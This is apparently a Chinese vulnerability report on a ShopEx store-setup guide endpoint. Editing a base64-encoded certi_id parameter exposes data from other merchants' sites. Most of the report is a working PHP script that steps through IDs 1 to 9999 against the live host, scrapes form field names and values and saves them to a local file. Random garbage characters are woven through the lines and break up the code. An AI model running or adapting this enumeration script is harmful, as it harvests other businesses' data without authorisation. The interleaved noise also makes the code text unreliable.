|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
3 m$ R0 u6 z5 v) b' h" w j# ?5 e& L; e0 i( P9 w9 g$ \7 h
% f: k. A5 Z& K0 d( s" Q
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
8 u+ b; B: P P! h* _6 A+ h# U
5 r4 e7 b8 P" s! g+ J9 _3 ]% q: P& ^
2 S' Y, `+ D2 D$ i1 I
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
5 D6 p8 V( B( r. b5 R
& k u2 W1 y p. d
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
8 q3 P3 K% e& [8 [ m
5 {( \' @7 j0 Q: d" K; T' a8 h; q1 k5 `
3 e) l' T7 ?; b% R1 [! d: [
<?php8 z: ?, N# I/ ]4 T! m" o# A4 N# z9 I
* Y$ |3 s" }+ h) N
for ($i=1; $i < 10000; $i++) { //遍历, y; ^" c3 \$ e* ]6 r1 x, e
' Z* @2 O. _4 z3 L) g, C ShowshopExD($i);' S Z1 ]3 r6 t, d& `# c1 H; J# x7 l
- I; c/ S' ~2 W! ?# a }+ l' D' k$ B5 }/ P
# y a% L! [; K. ^* p- h3 ] function ShowshopExD($cid) {# k) G3 q; Y6 i
) `8 o9 r0 j1 L7 B, R2 T $url='http://guide.ecos.shopex.cn/step2.php';
( W, ]8 C7 Y0 @2 r7 ~) K$ m- w; }) v- K6 |" [5 }' M& e! p: o
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
) x; F- d7 j, }7 n6 d; z5 @. A6 r. X, ^
4 q" h, C" i( X $url = $url.'?refer='.$refer;
' G0 N) k2 H3 j
8 e" C# L$ l3 o $ch = curl_init($url);
2 N$ T( R4 e3 t/ |2 `$ O1 k9 w$ u4 e+ J; E* _
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- ?: J! N. ]+ f6 V- {( Q$ X$ [1 X! F7 a( K$ f
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;( a" n, V4 \+ B- U9 P- Z9 L7 k
6 U/ B" ~) h" H5 T5 j
$result = curl_exec($ch);
" L2 L/ r* m( K( @8 w
7 Q. q( F! J1 M1 b+ V9 r- s3 r $result = mb_convert_encoding($result, "gb2312", "UTF-8");7 R Y! f2 s; @
: O ]/ V8 ?0 m+ j- P; ] if(strpos($result,$refer))3 D7 a" `0 ^/ \( i, Q1 t# H
, Q. y4 ^+ O: ~3 A4 D
{
. {$ [' L) |( p. o8 T
6 |1 d- }& A- a) [4 j $fp = fopen("c:/shopEx.txt",'ab'); //保存文件: t' g6 R; r# _
7 v0 b" Q+ C- r, U4 U* P# N
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);/ g$ j- e6 t& O; X
5 N# D- p1 f! L! b! {6 v
foreach ($value[1] as $key) {
. o7 S! Q, A& ]% J; G% e$ b$ f# W; K# I8 o
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
8 G0 u0 E. _: }% I; L) k* V" G/ L* J' s* P; ~
echo $res[1][0].':'.$res[3][0]."\r\n";
2 j& J F; C3 g0 d- Z' @
F: o! r( @! j3 f k$ `, |( h $col =$res[1][0].':'.$res[3][0]."\r\n";
7 o! p9 c- k. N
9 d7 B7 @& k$ e fwrite($fp, $col, strlen($col)); , Q1 O: z. Z& v$ h4 }6 q
0 \! q' P" u/ v8 G$ F
}
( k |4 Z0 z4 |0 l+ z
6 @0 {. p) N+ `, t' t echo '--------------------------------'."\r\n";
. X" Z1 z- U$ X M3 o5 ^8 G7 t
/ X* n# {& P. Y6 y. s fclose($fp);
1 M8 O) u1 n- H1 n9 Y3 Q$ W' E6 O, I/ [2 R
}
/ o+ w: y$ w/ z4 d) ?1 p% r! h" d( g( c! u( d* g# @* t
flush();% @5 ~) _( Q, q) @' Y3 l
/ x1 m# T# w* y& d: J1 ]
curl_close($ch);
5 ?3 W& B* A( h# t" B! T
1 [) M' [- G8 H1 w! j4 T/ T }8 m! m! }- }$ u- `6 g
# Q9 {2 a, s5 E% H# w9 [' {
?>9 J% F- [8 k9 R2 F4 g
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|